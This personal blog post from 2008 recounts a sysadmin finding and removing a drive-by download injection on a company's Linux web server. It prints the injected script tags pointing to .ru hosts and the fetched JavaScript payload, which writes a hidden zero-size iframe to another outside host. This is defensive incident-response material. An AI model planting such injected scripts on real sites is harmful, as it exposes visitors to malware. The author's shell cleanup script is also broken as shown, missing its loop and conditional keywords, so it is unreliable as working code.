Tuesday, August 05, 2008

Malware Attack

Last Wednesday, my colleague was telling me that one of our servers was attacked by Malware and his Firefox 3 browser "Reported Attack Site!"

I was wondering how they know that our server is suspected of malware attack. After some Googling, I found the following articles to be very useful in understanding this new type of attack called Drive-by Download

Basically a couple of ways to embed malware script in your server via:

  • public forum that allow users to embed any HTML codes such as IFRAME, SCRIPT
  • advertisements to untrusted content, difficult to maintain trust along such long advertisement delivery chains
  • exploit vulnerability in the browser or one of its plugins
  • exploit vulnerability in the server

Today, my boss was telling us that the Linux server is under malware attack and asked whether I 'know' Linux. Whenever people ask whether I 'know' something, I need them to define what is 'know'. Anyway, this is a golden opportunity for me to have first hand 'encounter' with Malware. After some traversing the directory, I found 200+ web pages has the this javascript embedded at the end of pages
<script src=http://www.kr92.ru/fgg.js></script>
This pattern tallies with what the above articles described. It is time to clean up all these pages. I remember this blog showed a very handy way to edit file using sed without having to create temporary file. "-i" flag in sed allows you to edit the file directory (FYI, sed in Solaris does not have this flag available). Here is my on-the-fly created script:

#! /bin/sh

for i in `find . -type f \( -name "*.html" -o -name "*.htm" \)`
        grep "www.kr92.ru" $i > /dev/null 2>&1
        if [ $? -eq 0 ]; then
                echo "Removing www.kr92.ru - $i ..."
                sed -i -e 's#<script src=http://www.kr92.ru/fgg.js></script>##' $i
                grep "www.kr92.ru" $i > /dev/null 2>&1
                if [ $? -eq 0 ]; then
                        echo Unsuccessful
                        echo OK

Wanna to find out what is inside http://www.kr92.ru/fgg.js

$ curl http://www.kr92.ru/fgg.js
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
document.cookie = "v1goo=update;expires="+expires.toGMTString();
document.write("<iframe src=http://ojns.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");

Apparently it is trying to include an IFRAME (http://ojns.ru/cgi-bin/index.cgi?ad) with zero width by zero height in your page.

According to this article, it reported 200+ different form of script references. Scary, isn't it. While I was writing this blog, my boss told me that the main page has this embedded.
<script src=http://www.8hcs.ru/js.js></script>

Likely I have to modify my script to cater for various forms of script reference, some regular expression matching to catch all those culprits.

Labels: ,


Blogger Colleen said...

I would love to know a couple of the files you were finding this in so I can check on my site and see if I'm finding anything familiar.

3:18 AM  
Blogger chihungchan said...

See my new post http://chihungchan.blogspot.com/2010/05/malware-attack-reply-comment.html

9:40 PM  

Post a Comment

<< Home